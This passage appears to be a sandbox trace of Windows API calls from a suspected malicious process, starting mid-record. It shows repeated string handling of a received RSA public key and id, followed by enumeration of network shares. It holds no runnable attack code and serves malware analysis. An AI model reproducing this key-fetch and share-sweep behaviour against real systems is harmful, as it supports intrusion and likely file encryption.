KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.301] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0100.301] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b250d8 | out: hHeap=0x670000) returned 1 [0100.301] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0100.301] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.301] lstrcpyA (in: lpString1=0xf31ab78, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0100.301] lstrcpyA (in: lpString1=0xf31a778, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0100.302] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0100.302] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b250d8 | out: hHeap=0x670000) returned 1 [0100.302] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0100.302] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.302] lstrlenW (lpString="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 40 [0100.315] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b1f720 | out: hHeap=0x670000) returned 1 Thread: id = 73 os_tid = 0xf8c [0100.911] timeGetTime () returned 0xf72974 [0100.911] GetLastError () returned 0x54f [0100.911] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3bc) returned 0x2b249b0 [0100.912] GetCurrentThreadId () returned 0xf8c [0100.912] SetLastError (dwErrCode=0x54f) [0100.912] Sleep (dwMilliseconds=0x1339e0) Thread: id = 74 os_tid = 0xf90 [0100.912] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x931fee0 | out: lphEnum=0x931fee0*=0x2b229c8) returned 0x0 [0102.067] WNetEnumResourceW (in: hEnum=0x2b229c8, lpcCount=0x931fedc, lpBuffer=0x2b7afc0, lpBufferSize=0x931fed8 | out: lpcCount=0x931fedc, lpBuffer=0x2b7afc0, lpBufferSize=0x931fed8) returned 0x0 [0102.067] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa8910 [0102.067] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa8958 [0102.067] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x70) returned 0x2a9e748 [0102.067] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa89a0 [0102.067] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x2aa89e8 [0102.067] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2b7afc0, lphEnum=0x931fe28 | out: lphEnum=0x931fe28*=0x2aa9358) returned 0x0 [0102.167] WNetEnumResourceW (in: hEnum=0x2aa9358, lpcCount=0x931fe24, lpBuffer=0x2b7efc8, lpBufferSize=0x931fe20 | out: lpcCount=0x931fe24, lpBuffer=0x2b7efc8, lpBufferSize=0x931fe20) returned 0x103 [0102.167] 